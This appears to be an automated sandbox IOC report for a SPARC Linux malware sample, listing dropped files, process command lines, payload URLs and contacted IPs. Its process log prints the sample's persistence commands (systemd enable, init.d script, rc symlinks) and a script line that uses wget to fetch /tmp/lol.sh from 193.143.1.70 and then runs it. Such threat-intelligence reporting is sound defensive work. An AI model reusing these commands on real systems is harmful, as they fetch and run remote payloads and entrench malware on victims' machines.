IOC Report
sparc.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
sparc.nn.elf
ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
initial sample
 malicious
/etc/init.d/sparc.nn.elf
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/system
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/profile
ASCII text
dropped
 malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
 malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/run/user/127/dconf/user
very short file (no magic)
dropped
/tmp/qemu-open.YvNz66 (deleted)
data
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
/tmp/sparc.nn.elf
/tmp/sparc.nn.elf
/tmp/sparc.nn.elf
-
/tmp/sparc.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/sparc.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/system
/tmp/sparc.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/sparc.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sparc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sparc.nn.elf'\n /tmp/sparc.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sparc.nn.elf'\n killall sparc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sparc.nn.elf"
/tmp/sparc.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/sparc.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/sparc.nn.elf
/tmp/sparc.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/sparc.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/sparc.nn.elf /etc/rc.d/S99sparc.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/sparc.nn.elf /etc/rc.d/S99sparc.nn.elf
/tmp/sparc.nn.elf
-
/tmp/sparc.nn.elf
-
/tmp/sparc.nn.elf
-
/tmp/sparc.nn.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/sbin/gdm3
-
/etc/gdm3/PrimeOff/Default
/etc/gdm3/PrimeOff/Default
/usr/sbin/gdm3
-
/etc/gdm3/PrimeOff/Default
/etc/gdm3/PrimeOff/Default
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/lib/systemd/systemd-user-runtime-dir
/lib/systemd/systemd-user-runtime-dir stop 127
There are 47 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://193.143.1.70/curl.sh
unknown
http://193.143.1.70/lol.sh
unknown
http://193.143.1.70/oro1vk/sbin/reboot/usr/sbin/reboot/bin/reboot/usr/bin/reboot/sbin/shutdown/usr/s
unknown
http://193.143.1.70/
unknown

IPs

IP
Domain
Country
Malicious
197.126.206.164
unknown
Egypt
165.3.234.77
unknown
South Africa
92.61.175.179
unknown
France
125.165.183.208
unknown
Indonesia
40.0.134.71
unknown
United States
47.222.229.21
unknown
United States
70.133.19.44
unknown
United States
218.217.185.195
unknown
Japan
172.65.2.111
unknown
United States
175.202.209.151
unknown
Korea Republic of
109.242.169.148
unknown
Greece
52.28.120.177
unknown
United States
193.159.83.158
unknown
Germany
212.142.207.113
unknown
Spain
194.224.15.156
unknown
Spain
88.83.212.190
unknown
Russian Federation
215.13.132.157
unknown
United States
74.243.22.51
unknown
United States
184.43.159.65
unknown
United States
7.131.247.61
unknown
United States
179.71.104.120
unknown
Brazil
5.166.22.51
unknown
Russian Federation
209.35.81.204
unknown
Canada
154.10.11.50
unknown
Korea Republic of
218.94.105.8
unknown
China
209.158.34.81
unknown
United States
96.219.143.18
unknown
United States
150.83.134.224
unknown
Japan
58.49.78.179
unknown
China
24.86.134.7
unknown
Canada
62.242.237.58
unknown
Denmark
118.174.158.46
unknown
Thailand
156.85.165.147
unknown
United States
59.189.39.92
unknown
Singapore
78.158.111.5
unknown
Ireland
9.250.131.79
unknown
United States
42.66.41.72
unknown
Taiwan; Republic of China (ROC)
208.150.214.115
unknown
United States
76.15.147.84
unknown
United States
32.47.36.218
unknown
United States
147.41.139.103
unknown
Australia
85.191.207.112
unknown
Denmark
207.36.200.181
unknown
United States
156.33.107.145
unknown
United States
200.177.159.156
unknown
Brazil
156.132.114.46
unknown
United States
154.197.202.163
unknown
Seychelles
100.205.148.193
unknown
United States
43.231.162.8
unknown
China
191.62.82.95
unknown
Brazil
196.5.215.169
unknown
South Africa
137.161.16.172
unknown
United States
190.164.146.1
unknown
Chile
156.127.163.73
unknown
United States
18.165.26.242
unknown
United States
5.166.34.53
unknown
Russian Federation
34.117.212.221
unknown
United States
209.193.143.32
unknown
United States
7.159.151.173
unknown
United States
198.65.94.173
unknown
United States
162.139.77.58
unknown
Canada
194.136.52.211
unknown
Finland
171.2.132.131
unknown
Japan
138.82.195.158
unknown
Canada
159.75.64.52
unknown
China
68.18.63.253
unknown
United States
74.209.148.52
unknown
United States
196.100.168.188
unknown
Kenya
26.235.152.248
unknown
United States
68.18.37.96
unknown
United States
48.170.46.20
unknown
United States
19.248.42.155
unknown
United States
65.35.50.62
unknown
United States
197.31.227.213
unknown
Tunisia
167.181.5.124
unknown
United States
28.211.218.186
unknown
United States
172.194.125.240
unknown
Australia
53.33.19.190
unknown
Germany
46.127.152.47
unknown
Switzerland
129.132.82.79
unknown
Switzerland
23.135.109.17
unknown
Reserved
69.122.119.52
unknown
United States
23.170.248.158
unknown
Reserved
198.196.224.149
unknown
United States
52.169.151.115
unknown
United States
77.51.110.31
unknown
Russian Federation
52.116.103.65
unknown
United States
37.38.66.124
unknown
Kuwait
165.206.8.63
unknown
United States
54.126.105.86
unknown
United States
174.175.11.111
unknown
United States
69.43.65.119
unknown
United States
65.200.96.197
unknown
United States
177.46.121.248
unknown
Brazil
111.39.73.150
unknown
China
104.153.236.219
unknown
United States
37.30.9.167
unknown
Poland
151.158.241.52
unknown
unknown
107.210.162.108
unknown
United States
200.15.173.239
unknown
United States
There are 90 hidden IPs, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7fda0002d000
page execute read
 malicious
7fda0002d000
page execute read
 malicious
7fdb0891a000
page read and write
7fdb07f4b000
page read and write
558068025000
page read and write
7ffdbb278000
page read and write
7fdb0891a000
page read and write
55806a043000
page read and write
7fdb07748000
page read and write
7ffdbb3ed000
page execute read
7fdb08a4b000
page read and write
7fdb085aa000
page read and write
7fda00042000
page read and write
7fdb08a43000
page read and write
7fdb08a43000
page read and write
7ffdbb3ed000
page execute read
7fda00042000
page read and write
55806b159000
page read and write
7fdb00021000
page read and write
7fdb07f4b000
page read and write
7fdb00021000
page read and write
558067df7000
page execute read
7fdb07748000
page read and write
7fdb081e8000
page read and write
7fdb00000000
page read and write
7fdb085cf000
page read and write
55806802e000
page read and write
7fdb081e8000
page read and write
7fdb085cf000
page read and write
55806802e000
page read and write
7fda0003e000
page read and write
7fdb00000000
page read and write
7fda0003e000
page read and write
7ffdbb278000
page read and write
558067df7000
page execute read
55806a02c000
page execute and read and write
7fdb08a4b000
page read and write
7fdb07f59000
page read and write
7fdb08a90000
page read and write
7fdb07f59000
page read and write
7fdb08a90000
page read and write
55806a043000
page read and write
55806a02c000
page execute and read and write
55806b159000
page read and write
7fdb085aa000
page read and write
7fda00047000
page read and write
558068025000
page read and write
There are 37 hidden memdumps, click here to show them.